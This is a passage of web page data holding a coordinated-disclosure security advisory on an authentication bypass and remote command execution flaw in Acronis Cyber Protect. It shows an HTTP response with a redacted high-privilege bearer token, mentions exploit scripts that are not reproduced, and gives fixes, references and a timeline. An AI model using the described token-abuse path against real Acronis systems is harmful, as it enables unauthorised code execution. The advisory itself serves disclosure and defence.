#ffcb6b;\">OK<\/span>\n<span class=\"na\" style=\"background: #263238; color: #bb80b3;\">Content-Length<\/span><span class=\"o\" style=\"background: #263238; color: #89ddff;\">:<\/span> <span class=\"l\" style=\"background: #263238; color: #c3e88d;\">13079<\/span>\n<span class=\"err\" style=\"background: #263238; color: #ff5370;\">[...]<\/span>{\"access_token\":\"eyJhbGciOiJSUzI1NiIsImVhcCI6MSwiaXJpIjoicE1nWHdKS[REDACTED:AT2]\",\"token_type\":\"bearer\",\"expires_in\":2591999,\"expires_on\":1646663799,\"id_token\":\"eyJhbGciOiJSUzI1[...]\",\"scope\":\"urn:acronis.com:tenant-id:alert_manager:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:active_protection urn:acronis.com:tenant-id:policy_management:00000000-0000-0000-0000-000000000000:read urn:acronis.com:tenant-id:s3_storage:00000000-0000-0000-0000-000000000000:write urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:agent_core urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_registrar urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_unregistrar urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_viewer urn:acronis.com:tenant-id:apn:00000000-0000-0000-0000-000000000000:node urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_updater urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:unit_configuration_viewer urn:acronis.com:tenant-id:resource_management:00000000-0000-0000-0000-000000000000:read urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:oauth2_client_admin(self) urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_unit_metadata_updater urn:acronis.com:tenant-id:policy_manager:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:scan_service:00000000-0000-0000-0000-000000000000:cwl_requestor 
urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|x#ATP_*:consumer urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:host_uploader urn:acronis.com:tenant-id:accounts:00000000-0000-0000-0000-000000000000:licensing_viewer urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:tenant_viewer urn:acronis.com:tenant-id:vault_manager:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:resource_manager:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:scan_service:00000000-0000-0000-0000-000000000000:scan_agent urn:acronis.com:tenant-id:accounts:00000000-0000-0000-0000-000000000000:licensing_admin urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|ATP_*:issuer urn:acronis.com:tenant-id:monitoring:00000000-0000-0000-0000-000000000000:provider urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:atp-agent urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000:trusted_viewer urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:ou_uploader urn:acronis.com:tenant-id:credentials_store:00000000-0000-0000-0000-000000000000:consumer urn:acronis.com:tenant-id:dpm:00000000-0000-0000-0000-000000000000:statistics_uploader urn:acronis.com:tenant-id:software_inventory:00000000-0000-0000-0000-000000000000:data_uploader urn:acronis.com:tenant-id:storage:00000000-0000-0000-0000-000000000000:readonly urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|ATP_*:consumer urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|SHI_VA:issuer urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:atp-downloader urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|ATP_BackupScan:consumer urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:atp-scan-agent 
urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|x#ATP_BackupScan*:consumer urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:crs urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000:consumer urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000:issuer urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000:viewer urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:cyber-protect-service urn:acronis.com:tenant-id:frs:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:corp-wl:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:bitdefender-cleanset:00000000-0000-0000-0000-000000000000:admin urn:acronis.com:tenant-id:agent_manager:00000000-0000-0000-0000-000000000000:agent_host_info_modifier urn:acronis.com:tenant-id:protection:00000000-0000-0000-0000-000000000000:readwrite urn:acronis.com:tenant-id:credentials_store:00000000-0000-0000-0000-000000000000:owner urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:mms urn:acronis.com:tenant-id:scan_service:00000000-0000-0000-0000-000000000000:restore_agent urn:acronis.com:tenant-id:storage:00000000-0000-0000-0000-000000000000:readwrite urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:sh-inventory urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000|SHI_*:consumer urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:sync-unit urn:acronis.com:tenant-id:task_manager:00000000-0000-0000-0000-000000000000:delegate urn:acronis.com:tenant-id:00000000-0000-0000-0000-000000000000:task-manager\"}<\/pre>\n<\/div>\n<p><strong>AT2<\/strong> inherits high privileges, as can already be observed at first glance via the returned <strong>scope<\/strong> parameter. Exemplary exploit paths are demonstrated within the attached \"acronis_pwn_agent.py\" and \"acronis_pwn_appliance.py\" scripts. 
With minor adjustments, these Python scripts can be used to automatically achieve code execution on a remote Acronis Cyber Protect instance.<\/p>\n<p>[\/et_pb_text][et_pb_code _builder_version=\"4.25.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" width=\"83%\" module_alignment=\"center\"]<iframe loading=\"lazy\" width=\"560\" height=\"315\" src=\"https:\/\/www.youtube-nocookie.com\/embed\/UCHJmv4SFKE?si=V4HlvA6fDM5wTdJL\" title=\"YouTube video player\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>[\/et_pb_code][et_pb_text _builder_version=\"4.25.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<\/p>\n<h3><span style=\"color: #86cccf;\">Fix<\/span><\/h3>\n<ol>\n<li>Anonymous registration should be disabled by default. This does not prevent attacks from already authenticated agents.<\/li>\n<li>Bearer tokens for agents should only be valid for the required functions of each agent. 
Their scope should be limited.<\/li>\n<\/ol>\n<h3><span style=\"color: #86cccf;\">References<\/span><\/h3>\n<ul>\n<li><a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/305.html\" target=\"_blank\" rel=\"noopener\">https:\/\/cwe.mitre.org\/data\/definitions\/305.html<\/a><\/li>\n<li><a href=\"https:\/\/security-advisory.acronis.com\/advisories\/SEC-4092\" target=\"_blank\" rel=\"noopener\">https:\/\/security-advisory.acronis.com\/advisories\/SEC-4092<\/a><\/li>\n<li><a href=\"https:\/\/security-advisory.acronis.com\/advisories\/SEC-3855\" target=\"_blank\" rel=\"noopener\">https:\/\/security-advisory.acronis.com\/advisories\/SEC-3855<\/a><\/li>\n<li><a href=\"https:\/\/security-advisory.acronis.com\/updates\/UPD-2204-c1f8-7a8a\" target=\"_blank\" rel=\"noopener\">https:\/\/security-advisory.acronis.com\/updates\/UPD-2204-c1f8-7a8a<\/a><\/li>\n<\/ul>\n<h3><span style=\"color: #86cccf;\">Timeline<\/span><\/h3>\n<ul>\n<li><strong>2021-02-04<\/strong>: Vulnerability identified by Sandro Tolksdorf<\/li>\n<li><strong>2022-02-07<\/strong>: Initial contact via security@acronis.com<\/li>\n<li><strong>2022-02-08<\/strong>: Vulnerability is submitted via HackerOne<\/li>\n<li><strong>2022-04-22<\/strong>: Fixed by vendor<\/li>\n<li><strong>2022-11-08<\/strong>: The advisory is published in coordination with the vendor<\/li>\n<\/ul>\n<h3><span style=\"color: #86cccf;\">Credits<\/span><\/h3>\n<p>This security vulnerability was found by Sandro Tolksdorf of usd AG.<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2022-008 | Authentication Bypass with subsequent Remote Command Execution in Acronis Cyber Protect Advisory ID: usd-2022-0008 Product: Acronis Cyber Protect Affected Version: Server Version 15.0.28503 Vulnerability Type: Authentication Bypass (CWE-305) Security Risk: Critical Vendor URL: https:\/\/www.acronis.com\/en-us\/products\/cyber-protect\/ Vendor Status: Fixed CVE IDs: CVE-2022-3405, CVE-2022-30995 CVE Links: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-3405, 
https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-30995 &nbsp;Introduction The Acronis Cyber Protect appliance, in its [&hellip;]<\/p>\n","protected":false},"author":109,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-19123","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/19123","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/109"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=19123"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/19123\/revisions"}],"predecessor-version":[{"id":22787,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/19123\/revisions\/22787"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=19123"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}